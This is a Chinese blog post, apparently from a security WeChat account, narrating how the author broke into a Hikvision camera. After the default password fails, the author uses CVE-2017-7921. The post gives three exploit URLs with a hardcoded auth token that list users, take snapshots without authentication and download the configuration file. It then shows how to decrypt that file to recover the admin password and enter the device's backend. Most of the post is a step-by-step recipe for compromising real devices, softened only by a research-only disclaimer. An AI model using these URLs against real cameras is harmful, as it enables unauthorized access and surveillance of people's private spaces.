最近在在项目中遇到了海康威视,然后爆破了一下admin的弱口令,没成功,然后就想到了CVE-2017-7921这个漏洞,这里就对我在实际中利用这个漏洞进行总结记录
先找到了这个海康威视的网站,找到这个网站,心里开心的一批,脸上一下就漏出了“猥琐”的笑脸。可是一波海康威视的默认口令admin:12345没成功。
弱口令不行,就只有试试CVE了,网上一搜海康威视漏洞,出来的最多的就是CVE-2017-7921
CVE-2017-7921的exp有如下三个:
-
检索所有用户及其角色的列表
http://camera.ip/Security/users?auth=YWRtaW46MTEK
用户名还是默认用户admin
-
在没有身份验证的情况下获取摄像头快照
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
因为涉及到摄像头隐私,这里打码比较严重
-
下载摄像头配置账号密码文件
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
用hex编辑器打开下载的configurationFile文件发现是加密后的
在github上找到一个师傅写的解密程序Hikvision Decrypter:https://github.com/WormChickenWizard/hikvision-decrypter
下载后我们加载解密这个configurationFile文件,然后用hex编辑器搜索admin,即可发现密码
这里记得要选Encrypted
解密以后,点击Save
使用十六进制编辑器或者记事本打开解密以后的文件,搜索admin可以找到密码
进入后台,查看配置
微信搜索 : secteam
长按识别二维码关注
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论